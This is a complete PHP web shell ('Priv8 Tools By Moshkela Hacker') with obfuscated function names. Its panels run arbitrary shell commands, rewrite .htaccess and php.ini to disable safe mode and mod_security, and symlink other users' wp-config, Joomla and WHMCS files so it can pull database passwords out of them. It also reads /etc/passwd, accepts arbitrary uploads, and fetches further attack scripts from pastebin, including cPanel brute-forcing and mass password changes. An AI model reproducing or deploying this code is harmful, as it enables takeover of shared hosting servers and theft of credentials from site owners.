confg1.php

1. </br>";
2.    
3.     session_start();
4.     if(!isset($_SESSION['sec']))
5.     {
6.         $_SESSION['sec'] = false;
7.     }
8.     if(isset($pass))
9.     {
10.         if($user == $username and md5($pass) == $password)
11.         {
12.             $_SESSION['sec'] = true;
13.         }
14.         else
15.         {
16.             die("{$form} <br> Error :D");
17.         }
18.     }
19.     if(!$_SESSION['sec']):
20.     echo $form;
21.     exit();
22.     endif;
23.    
24.     # Logout
25.     if($_GET['log'] == 'out')
26.     {
27.         session_destroy();
28.     }
29.     echo "Welcome {$user} | <a href='?log=out'>Logout</a>";
30.    
31. ?>
32. <head>
33.  
34. <title>Priv8 Tools By Moshkela Hacker</title>
35. <link rel="icon" href="http://icons.iconarchive.com/icons/iconscity/flags/128/iraq-icon.png">
36. </head>
37. <?
38. set_time_limit(0);
39. error_reporting(0);
40. ?>
41. <html>
42.  
43.  
44. <style type="text/css">
45. html,body{
46.     background: #f9f9f9;
47.     padding: 0;
48.     direction: ltr;
49.     margin: 0;
50. }
51. h1{
52.     color:#ff0000;
53.     text-shadow:0 0 5px;
54. }
55. h3{
56.     color:#ff0000;
57.     text-shadow:0 0 1px;
58. }
59. .f{
60.     color:#666;
61.     text-shadow: 0 0 5px #00ff00;
62.     font-size: 20px;
63. }
64. a{
65.     text-decoration: none;
66.     color:#ff0000;
67.     text-shadow:0 0 5px;
68. }
69. input[type=submit]{
70.     padding: 9px;
71.     border:1px solid #ccc;
72.     background: #f9f9f9;
73.     border-radius: 2px;
74.     cursor: pointer;
75.     color:#000;
76.     transition: all 0.2s;
77. }
78. input[type=submit]:hover{
79.     box-shadow: 0 0 2px #ff0000;
80. }
81. input[type=text]{
82.     color:#000;
83.     border:1px solid #ccc;
84.     background: #f9f9f9;
85.     padding: 10px;
86.     width: 400px;
87.     transition: all 0.5s;
88. }  
89. input[type=text]:focus{
90.     box-shadow: 0 0 3px #ff0000;
91. }
92. hr{
93.     border: 0;
94.     height: 2px;
95.     background: #333;
96.     background-image: linear-gradient(to right, #FF00FF, #333, #FF00FF);
97. }}
98.     </style>
99. <center>
100. <hr>
101. <form method='GET'>
102.  
103. <input type='submit'name='tool' value='Safe Mode' size='10' >
104. <input type='submit'name='tool' value='Execute' size='10' >
105. <input type='submit'name='tool' value='Config Killer' size='10' >
106. <input type='submit'name='tool' value='Symlink' size='10' >
107. <input type='submit'name='tool' value='Symlink 2' size='10' >
108. <input type='submit'name='tool' value='Jumping' size='10' >
109. <input type='submit'name='tool' value='Pass Config' size='10' >
110. <input type='submit'name='tool' value='Upload' size='10' >
111. <input type='submit'name='tool' value='Other tools' size='10' >
112. <input type='submit'name='tool' value='Server Info' size='10' >
113. <input type='submit'name='tool' value='About' size='10' >
114.  
115.  
116.                                        
117. </h5>
118.  
119. </form>
120. <hr>
121. <?php
122. $x73 = "basename";
123. $x74 = "chdir";
124. $x75 = "copy";
125. $x76 = "error_reporting";
126. $x77 = "eregi";
127. $x78 = "ereg";
128. $x79 = "explode";
129. $x7a = "fclose";
130. $x7b = "file_get_contents";
131. $x7c = "file_put_contents";
132. $x7d = "file";
133. $x7e = "flush";
134. $x7f = "fileowner";
135. $x80 = "fopen";
136. $x81 = "fwrite";
137. $x82 = "function_exists";
138. $x83 = "getcwd";
139. $x84 = "ini_restore";
140. $x85 = "ini_get";
141. $x86 = "is_file";
142. $x87 = "mail";
143. $x88 = "mkdir";
144. $x89 = "mysql_connect";
145. $x8a = "mysql_fetch_array";
146. $x8b = "mysql_query";
147. $x8c = "mysql_select_db";
148. $x8d = "phpversion";
149. $x8e = "posix_getpwuid";
150. $x8f = "preg_match_all";
151. $x90 = "preg_match";
152. $x91 = "rand";
153. $x92 = "set_time_limit";
154. $x93 = "shell_exec";
155. $x94 = "strlen";
156. $x95 = "symlink";
157. $x96 = "system";
158. $x97 = "trim";
159. $x92(0);
160. $x76(0);
161.    
162. ///Safe Mode
163. if ($_REQUEST['tool'] == "Safe Mode") {
164.     echo '<h3> Safe Mode Fucker </h3>
165. <br><form method="POST" action="">
166. <select name="way">
167. <option>php.ini</option>
168. <option>ini.php</option>
169. <option>htaccess</option>
170. </select><input name="bypass" type="submit"class="dh" value="Bypass Using"><br>';
171.     if ($_POST['way'] == "htaccess") {
172.         x0b();
173.     } elseif ($_POST['way'] == "php.ini") {
174.         x0c();
175.     } elseif ($_POST['way'] == "ini.php") {
176.         x0d();
177.     }
178. }
179. function x0b() {
180.     global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
181.     $x2f = $x80($x83() . $x30 . "/.htaccess", "w");
182.     $x81($x2f, "Options +FollowSymLinks
183. DirectoryIndex india.htm
184.  
185. Options All Indexes
186. <IfModule mod_security.c>
187. SecFilterEngine Off
188. SecFilterScanPOST Off
189.  
190. SecFilterCheckURLEncoding Off
191. SecFilterCheckCookieFormat Off
192. SecFilterCheckUnicodeEncoding Off
193. SecFilterNormalizeCookies Off
194. </IfModule>
195. SetEnv PHPRC " . $x83() . $x30 . "/php.ini
196. suPHP_ConfigPath " . $x83() . $x30 . "/php.ini");
197.     $x7a($x2f);
198.     if ($x86($x83() . $x30 . "/.htaccess")) {
199.         echo "<Span style='color:#FF00FF;'><strong>.htaccess Created successfully</strong></span><br>";
200.     } else {
201.         echo "<strong><Span style='color:#FF00FF;'>I can not create .htaccess</strong></span><br>";
202.     };
203. }
204. function x0c() {
205.     global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
206.     $x31 = $x80($x83() . $x30 . "/php.ini", "w");
207.     $x81($x31, "safe_mode = Off
208. disable_functions = NONE
209. safe_mode_gid = OFF
210.  
211. open_basedir = OFF");
212.     $x7a($x31);
213.     if ($x86($x83() . $x30 . "/php.ini")) {
214.         echo "<strong><Span style='color:#FF00FF;'>php.ini Created successfully</strong></span><br>";
215.     } else {
216.         echo "<strong><Span style='color:#FF00FF;'>I can not create php.ini</strong></span><br>";
217.     };
218. }
219. function x0d() {
220.     global $x73, $x74, $x75, $x76, $x77, $x78, $x79, $x7a, $x7b, $x7c, $x7d, $x7e, $x7f, $x80, $x81, $x82, $x83, $x84, $x85, $x86, $x87, $x88, $x89, $x8a, $x8b, $x8c, $x8d, $x8e, $x8f, $x90, $x91, $x92, $x93, $x94, $x95, $x96, $x97;
221.     $x32 = $x80($x83() . $x30 . "/ini.php", "w");
222.     $x81($x32, '$x84("safe_mode");
223. $x84("open_basedir");');
224.     $x7a($x32);
225.     if ($x86($x83() . $x30 . "/ini.php")) {
226.         echo "<strong><Span style='color:#FF00FF;'>ini.php Created successfully</strong></span><br>";
227.     } else {
228.         echo "<strong><Span style='color:red;'>I can not create ini.php</strong></span><br>";
229.     };
230. }
231. //////Execute
232. if ($_REQUEST['tool'] == "Execute") {
233.     echo '<h3> Execute </h3>
234.     <form method="post">
235. <input  name="cmd" />
236. <input type="submit"class="dh" name="go" />
237. </form>';
238.     if ($_POST['go']) {
239.         $x4b = $x82("system");
240.         $x4c = $x82("passthru");
241.         $x4d = $x82("shell_exec");
242.         if ($x4b) {
243.             echo "<textarea readonly='' cols='90'rows='20'>";
244.             echo $x96($_POST['cmd']);
245.             echo '</textarea>';
246.         }
247.         if (!$x4b & $x4c) {
248.             echo "<textarea readonly='' cols='90'rows='20'>";
249.             echo passthrsu($_POST['cmd']);
250.             echo '</textarea>';
251.         }
252.         if (!$x4b & !$x4c & $x4d) {
253.             echo "<textarea readonly='' cols='90'rows='20'>";
254.             echo $x93($_POST['cmd']);
255.             echo '</textarea>';
256.         }
257.     }
258. }
259. /////upload
260. else if ($_REQUEST['tool'] == "Upload") {
261.     echo"<h3>Upload</h3>";
262.     if(isset($_POST['Submit'])){
263.     $filedir = "";
264.     $maxfile = '2000000';
265.  
266.     $userfile_name = $_FILES['image']['name'];
267.     $userfile_tmp = $_FILES['image']['tmp_name'];
268.     if (isset($_FILES['image']['name'])) {
269.         $abod = $filedir.$userfile_name;
270.         @move_uploaded_file($userfile_tmp, $abod);
271.  
272. echo"<center><b><h3> Don3 ==> $userfile_name</h3></b></center>";
273. }
274. }
275. else{
276. echo'
277. <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit"class="dh" name="Submit" value="up"></form>';
278. }
279. }
280. ////Config Killer
281. else if ($_REQUEST['tool'] == "Config Killer") {
282.    
283.     echo "<br><center><h3>Config Killer</h3>"; ?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#007700" size="2pt"></p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo $x7b('/etc/passwd'); ?></textarea><br><br><input name="config"  size="100" value="GET Config" type="submit"class="dh"><br></form></center><br><?php
284.     }
285.     if ($_POST['config']) {
286.         $x33 = $x34 = @$x85("disable_functions");
287.         if ($x77("symlink", $x34)) {
288.             die('<error>Symlink is disabled :( </error>');
289.         }
290.         @$x88('M-Iraq', 0755);
291.         @$x74('M-Iraq');
292.         $x2f = "
293.  
294. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
295.  
296. Options Indexes FollowSymLinks
297. ForceType text/plain
298. AddType text/plain .php
299.  
300. AddType text/plain .html
301.  
302. AddType text/html .shtml
303. AddType txt .php
304. AddHandler server-parsed .php
305.  
306. AddHandler txt .php
307.  
308. AddHandler txt .html
309.  
310. AddHandler txt .shtml
311.  
312. Options All
313. Options All";
314.         $x7c(".htaccess", $x2f, FILE_APPEND);
315.         $x35 = $_POST["passwd"];
316.         $x35 = $x79("
317. ", $x35);
318.        
319.         foreach ($x35 as $x36) {
320.             $x37 = $x79(":", $x36);
321.             $x38 = $x37[0];
322.             @$x95('/home/' . $x38 . '/public_html/wp-config.php', $x38 . '-wp13.txt');
323.             @$x95('/home/' . $x38 . '/public_html/wp/wp-config.php', $x38 . '-wp13-wp.txt');
324.             @$x95('/home/' . $x38 . '/public_html/WP/wp-config.php', $x38 . '-wp13-WP.txt');
325.             @$x95('/home/' . $x38 . '/public_html/wp/beta/wp-config.php', $x38 . '-wp13-wp-beta.txt');
326.             @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp13-beta.txt');
327.             @$x95('/home/' . $x38 . '/public_html/press/wp-config.php', $x38 . '-wp13-press.txt');
328.             @$x95('/home/' . $x38 . '/public_html/wordpress/wp-config.php', $x38 . '-wp13-wordpress.txt');
329.             @$x95('/home/' . $x38 . '/public_html/Wordpress/wp-config.php', $x38 . '-wp13-Wordpress.txt');
330.             @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp13-Wordpress.txt');
331.             @$x95('/home/' . $x38 . '/public_html/config.php', $x38 . '-configgg.txt');
332.             @$x95('/home/' . $x38 . '/public_html/news/wp-config.php', $x38 . '-wp13-news.txt');
333.             @$x95('/home/' . $x38 . '/public_html/new/wp-config.php', $x38 . '-wp13-new.txt');
334.             @$x95('/home/' . $x38 . '/public_html/blog/wp-config.php', $x38 . '-wp-blog.txt');
335.             @$x95('/home/' . $x38 . '/public_html/beta/wp-config.php', $x38 . '-wp-beta.txt');
336.             @$x95('/home/' . $x38 . '/public_html/blogs/wp-config.php', $x38 . '-wp-blogs.txt');
337.             @$x95('/home/' . $x38 . '/public_html/home/wp-config.php', $x38 . '-wp-home.txt');
338.             @$x95('/home/' . $x38 . '/public_html/db.php', $x38 . '-dbconf.txt');
339.             @$x95('/home/' . $x38 . '/public_html/site/wp-config.php', $x38 . '-wp-site.txt');
340.             @$x95('/home/' . $x38 . '/public_html/main/wp-config.php', $x38 . '-wp-main.txt');
341.             @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-wp-test.txt');
342.             @$x95('/home/' . $x38 . '/public_html/joomla/configuration.php', $x38 . '-joomla2.txt');
343.             @$x95('/home/' . $x38 . '/public_html/portal/configuration.php', $x38 . '-joomla-protal.txt');
344.             @$x95('/home/' . $x38 . '/public_html/joo/configuration.php', $x38 . '-joo.txt');
345.             @$x95('/home/' . $x38 . '/public_html/cms/configuration.php', $x38 . '-joomla-cms.txt');
346.             @$x95('/home/' . $x38 . '/public_html/site/configuration.php', $x38 . '-joomla-site.txt');
347.             @$x95('/home/' . $x38 . '/public_html/main/configuration.php', $x38 . '-joomla-main.txt');
348.             @$x95('/home/' . $x38 . '/public_html/news/configuration.php', $x38 . '-joomla-news.txt');
349.             @$x95('/home/' . $x38 . '/public_html/new/configuration.php', $x38 . '-joomla-new.txt');
350.             @$x95('/home/' . $x38 . '/public_html/home/configuration.php', $x38 . '-joomla-home.txt');
351.             @$x95('/home/' . $x38 . '/public_html/vb/includes/config.php', $x38 . '-vb-config.txt');
352.             @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm15.txt');
353.             @$x95('/home/' . $x38 . '/public_html/central/configuration.php', $x38 . '-whm-central.txt');
354.             @$x95('/home/' . $x38 . '/public_html/whm/whmcs/configuration.php', $x38 . '-whm-whmcs.txt');
355.             @$x95('/home/' . $x38 . '/public_html/whm/WHMCS/configuration.php', $x38 . '-whm-WHMCS.txt');
356.             @$x95('/home/' . $x38 . '/public_html/whmc/WHM/configuration.php', $x38 . '-whmc-WHM.txt');
357.             @$x95('/home/' . $x38 . '/public_html/whmcs/configuration.php', $x38 . '-whmcs.txt');
358.             @$x95('/home/' . $x38 . '/public_html/support/configuration.php', $x38 . '-support.txt');
359.             @$x95('/home/' . $x38 . '/public_html/configuration.php', $x38 . '-joomla.txt');
360.             @$x95('/home/' . $x38 . '/public_html/submitticket.php', $x38 . '-whmcs2.txt');
361.             @$x95('/home/' . $x38 . '/public_html/whm/configuration.php', $x38 . '-whm.txt');
362.         }
363.         echo '<b class="cone"><font face="Tahoma" color="#FF00FF" size="2pt"><b>[M-IRAQ] -></b> <a target="_blank" href="M-Iraq">Open configs</a></font></b>';
364.     }
365. }
366. ////Symlink
367. else if ($_REQUEST['tool'] == "Symlink") {
368.     echo "<h3>Symlink Bypass </h3>";
369.     echo '<form action="" method="post">';
370.     @$x92(0);
371.     echo "<center>";
372.     @$x88('m-iraq', 0777);
373.     $x2f = "Options Indexes FollowSymLinks
374. DirectoryIndex ssssss.htm
375. AddType txt .php
376. AddHandler txt .php
377. AddType txt .html
378. AddHandler txt .html
379. Options all
380. Options
381. Options
382. ReadmeName r.txt";
383.     $x26 = @$x80('m-iraq/.htaccess', 'w');
384.     $x81($x26, $x2f);
385.     @$x95('/', 'm-iraq/root');
386.     $x27 = $x73('index.php');
387.     $x28 = @$x7d('/etc/named.conf');
388.     if (!$x28) {
389.         echo "<pre ='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
390.     } else {
391.         echo "<br><br><div><table border='1' bordercolor='#FF00FF' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
392.         foreach ($x28 as $x29) {
393.             if ($x77('zone', $x29)) {
394.                 $x8f('#zone "(.*)"#', $x29, $x2a);
395.                 $x7e();
396.                 if ($x94($x97($x2a[1][0])) > 2) {
397.                     $x2b = $x8e(@$x7f('/etc/valiases/' . $x2a[1][0]));
398.                     $x2c = $x2b['name'];
399.                     @$x95('/', 'm-iraq/root');
400.                     $x2c = $x2a[1][0];
401.                     $x2d = '\.sa';
402.                     $x2e = '\.il';
403.                     $x1e = '\.id';
404.                     $x1f = '\.sg';
405.                     $x20 = '\.edu';
406.                     $x21 = '\.gov';
407.                     $x22 = '\.go';
408.                     $x23 = '\.gob';
409.                     $x24 = '\.mil';
410.                     $x25 = '\.mi';
411.                     if ($x77("$x2d", $x2a[1][0]) or $x77("$x2e", $x2a[1][0]) or $x77("$x1e", $x2a[1][0]) or $x77("$x1f", $x2a[1][0]) or $x77("$x20", $x2a[1][0]) or $x77("$x21", $x2a[1][0]) or $x77("$x22", $x2a[1][0]) or $x77("$x23", $x2a[1][0]) or $x77("$x24", $x2a[1][0]) or $x77("$x25", $x2a[1][0])) {
412.                         $x2c = "<div style=' color: #FF00FF ; text-shadow: 0px 0px 1px red; '>" . $x2a[1][0] . '</div>';
413.                     }
414.                     echo "
415. <tr>
416. <td>
417. <div class='dom'><a target='_blank' href=http://www." . $x2a[1][0] . '/>' . $x2c . ' </a> </div>
418. </td>
419. <td>
420. ' . $x2b['name'] . "
421. </td>
422.  
423. <td>
424. <a href='m-iraq/root/home/" . $x2b['name'] . "/public_html' target='_blank'>Symlink </a>
425. </td>
426. </tr></div> ";
427.                 }
428.             }
429.         }
430.     }
431.     echo "</table>";
432. }
433. //// Symlink2
434. else if ($_REQUEST['tool'] == "Symlink 2") {
435.     echo '
436. <h3>Symlink-2</h3>
437. <FORM ACTION="#" METHOD="POST">
438. <br>
439. <br>
440. <center> <font size="2" face="MV Boli" color=rgba(1, 44, 221, 0.9) ></font> <INPUT TYPE="text" NAME="user"placeholder="/home/user/public_html/config.php" SIZE=60><INPUT TYPE="submit"class="dh" VALUE="Sym"> </center>
441. </FORM>';
442.     $x4e = $_POST["user"];
443.     $x4f = '' . $x91() . '.txt';
444.     if ($x4e) {
445.         $x50 = $x91();
446.         @$x88($x50);
447.         $x51 = $x50 . "/.htaccess";
448.         $x52 = $x80($x51, 'w') or die("Error: Can't open file");
449.         $x53 = 'Options +Indexes
450. ReadMeName ' . $x4f;
451.         $x81($x52, $x53);
452.         $x7a($x52);
453.         $x74($x50);
454.         $x95($x4e, $x4f);
455.         $x74("../");
456.         echo "<center><iframe height ='500px' width='100%' src=" . $x50 . "></iframe></center>";
457.     }
458. }
459. /////Get Password in Config
460. else if ($_REQUEST['tool'] == "Pass Config") {
461.     echo"<h3>Get Password in Config</h3>";
462.     echo '<form method="post">
463. <input type="text" name="conf" value="" />
464. <input type="submit"class="dh"value="GeT Passwords" name="get" />
465. </form>';
466.     $x39 = $_POST['get'];
467.     $x3a = $_POST['conf'];
468.     //////////////////////////////////////////////////////////////////////////////////////////////
469.     if (isset($x39) && $x3a != "") {
470.         $x3b = @$x7b($x3a);
471.         //$x8f('#href="(.*?)">(.*?)<#',$x3b,$x3c);    // $x3c[2]
472.         $x8f('#href="(.*?)"#', $x3b, $x3c);
473.         foreach ($x3c[1] as $x3d) {
474.             $x3e = $x3a . $x3d;
475.             $x3f = @$x7b($x3e);
476.             $x90('#\'DB_PASSWORD\', \'(.*)\'#', $x3f, $x40); // wordpress
477.             $x90('#password = \'(.*)\'#', $x3f, $x41); // joomla
478.             $x90('#password\'] = \'(.*)\'#', $x3f, $x42); // vb
479.             $x90('#db_password = "(.*)"#', $x3f, $x43); // whmcs
480.             $x90('#db_password = \'(.*)\'#', $x3f, $x43); // whmcs
481.             $x90('#dbpass = "(.*)"#', $x3f, $x44); //
482.             $x90('#password = \'(.*)\'#', $x3f, $x45); // connnect.php
483.             $x90('#dbpasswd = \'(.*)\'#', $x3f, $x46); // phpBB 3.0.x
484.             $x90('#password_localhost = "(.*)"#', $x3f, $x47); // conexao.php
485.             $x90('#senha = "(.*)"#', $x3f, $x48); // /_inc/config.inc.php
486.             if (!empty($x40[1])) {
487.                 echo $x40[1] . "<br>";
488.             } elseif (!empty($x41[1])) {
489.                 echo $x41[1] . "<br>";
490.             } elseif (!empty($x42[1])) {
491.                 echo $x42[1] . "<br>";
492.             } elseif (!empty($x43[1])) {
493.                 echo $x43[1] . "<br>";
494.             } elseif (!empty($x44[1])) {
495.                 echo $x44[1] . "<br>";
496.             } elseif (!empty($x45[1])) {
497.                 echo $x45[1] . "<br>";
498.             } elseif (!empty($x49[1])) {
499.                 echo $x49[1] . "<br>";
500.             } elseif (!empty($x46[1])) {
501.                 echo $x46[1] . "<br>";
502.             } elseif (!empty($x47[1])) {
503.                 echo $x47[1] . "<br>";
504.             } elseif (!empty($x48[1])) {
505.                 echo $x48[1] . "<br>";
506.             }
507.         }
508.     }
509. }
510. ////Jumping
511. else if ($_REQUEST['tool'] == "Jumping") {
512.     echo"<h3>Jumping</h3>";
513.     $x26 = "array_push";
514.     $x27 = "feof";
515.     $x28 = "fgets";
516.     $x29 = "fopen";
517.     $x2a = "ini_get";
518.     $x2b = "is_readable";
519.     $x2c = "set_time_limit";
520.     $x2d = "strpos";
521.     $x2e = "substr";
522.     ($x2f = $x2a('safe_mode') == 0) ? $x2f = 'off' : die('<b>Error: Safe Mode is On</b>');
523.     $x2c(0);
524.     @$x30 = $x29('/etc/passwd', 'r');
525.     if (!$x30) {
526.         die('<b><font face=Verdana size=2 color=#FF00FF> Error : Can Not Read Config Of Server </b>');
527.     }
528.     $x31 = array();
529.     $x32 = array();
530.     $x33 = array();
531.     $x34 = 0;
532.     echo "<b><font face=Verdana size=13 color=#FF00FF>  </font></b><br />";
533.     echo "<br />";
534.     while (!$x27($x30)) {
535.         $x35 = $x28($x30);
536.         if ($x34 > 35) {
537.             $x36 = $x2d($x35, ':');
538.             $x37 = $x2e($x35, 0, $x36);
539.             $x38 = '/home/' . $x37 . '/public_html/';
540.             if (($x37 != '')) {
541.                 if ($x2b($x38)) {
542.                     $x26($x32, $x37);
543.                     $x26($x31, $x38);
544.                     echo "<font face=Verdana size=2 color=#FF00FF> $x38</font>";
545.                     echo "<br/>";
546.                 }
547.             }
548.         }
549.         $x34++;
550.     }
551. }
552. /////About
553. else if ($_REQUEST['tool'] == "About") {
554.     echo '
555. <img src="http://d.top4top.net/p_37rzbl1.png" width="500" height="400" />
556. <h1> Coded By Moshkela Hacker<br>
557.                                        
558. </h1>
559. <h3>tnx : Mostafa Moshkela </h3>
560.  
561. ';
562. }
563. ////Server Info
564. else if ($_REQUEST['tool'] == "Server Info") {
565.     echo"<h3>Server Info</h3>";
566.     $safe = ini_get("safe_mode");
567. if($safe == 1){
568.     $safe_mode =  "<font color=red>ON</font>";
569.     }else{
570.         $safe_mode = "<font color=#FF00FF>OFF</font>";
571.         }
572. $dis = ini_get("disable_functions");
573. if($dis == ""){
574.     $disable = "<font color=#FF00FF>None</font>";
575.     }else{
576.         $disable = "<font color=red>$dis</font>";
577.         }
578. $uname = php_uname();
579. $server = $_SERVER['SERVER_ADDR'];
580. $me = $_SERVER['REMOTE_ADDR'];
581. echo "
582. <div>
583. <span>
584. Uname-a : $uname<br>
585. Safe Mode : $safe_mode<br>
586. Disable Functions : $disable
587. </span>
588. <span class=info2>
589. <br>Server IP : $server </br>
590. <br>Your IP : $me </br>
591. </span>
592. </div>
593. ";
594.  
595. }else if($_REQUEST['tool'] == "Other tools"){
596.     echo"<h3>Other tools</h3>";
597.     echo'<form method="post">
598. <b><span style=\"color: rgb(51, 204, 0);\"> Tools  : <b></span><select name="tools" >
599. <option>Moshkela Hacker Tools</option>
600. <option>Find Shell</option>
601. <option>Get Jomla Sites</option>
602. <option>Get WordPress Sites</option>
603. <option>Get All Sites Server</option>
604. <option>1337w0rm</option>
605. <option>Adminer</option>
606. <option>Mass Password</option>
607. </select>
608. <input type="submit" name="get" value="Get" />
609. </form>';
610. /////////////////////////////////////////////////////////////////
611. if($_POST['get']){
612.  
613.     switch($_POST['tools']){
614.    
615.         //////////////////////////////////////////////البحث عن الشلات
616.         case "Find Shell":
617.         if(file_put_contents('Findshell.php',file_get_contents('http://pastebin.com/raw/AR8MzfZV'))){
618.             echo "<center><font color=red size=8>Findshell.php Done !</font></center>";
619.         };
620.         break;
621.         ////////////////////////////////////////////// جلب المواقع المركبه سكربت جوملا
622.         case "Get Jomla Sites":
623.         if(file_put_contents('jomla.php',file_get_contents('http://pastebin.com/raw/9BQ62rZF'))){
624.             echo "<center><font color=red size=8>jomla.php Done !</font></center>";
625.         }
626.         break;     
627.         ////////////////////////////////////////////// جلب المواقع المركبه سكربت وردبرس
628.         case "Get WordPress Sites":
629.         if(file_put_contents('wordpress.php',file_get_contents('http://pastebin.com/raw/504iswx3'))){
630.             echo "<center><font color=red size=8>wordpress.php Done !</font></center>";
631.         }
632.         break; 
633.         //////////////////////////////////////////////  جلب جميع المواقع على السيرفر   
634.         case "Get All Sites Server":
635.         if(file_put_contents('ip.php',file_get_contents('http://pastebin.com/raw/c70btt4r'))){
636.             echo "<center><font color=red size=8>ip.php Done !</font></center>";
637.         }
638.         break;     
639.         ////////////////////////////////////////////// التخمين على السي بنل
640.         case "1337w0rm":
641.         if(file_put_contents('1337w0rm.php',file_get_contents('http://pastebin.com/raw/sqK6hVJd'))){
642.             echo "<center><font color=red size=8>1337w0rm.php Done !</font></center>";
643.         }
644.         break;     
645.         //////////////////////////////////////////////الاتصال بقاعدة البيانات
646.                 case "Adminer":
647.         if(file_put_contents('Adminer.php',file_get_contents('http://pastebin.com/raw/BZHXtZqu'))){
648.             echo "<center><font color=red size=8>Adminer.php Done !</font></center>";
649.         }
650.         break;     
651.         //////////////////////////////////////////////تغير جميع مواقع السيرفر
652.                 case "Mass Password":
653.         if(file_put_contents('Masspass.php',file_get_contents('http://pastebin.com/raw/eLv6MUpD'))){
654.             echo "<center><font color=red size=8>Masspass.php Done !</font></center>";
655.         }
656.         break;     
657.         //////////////////////////////////////////////
658.         } // switch end
659. }// end if
660. }      
661. ?>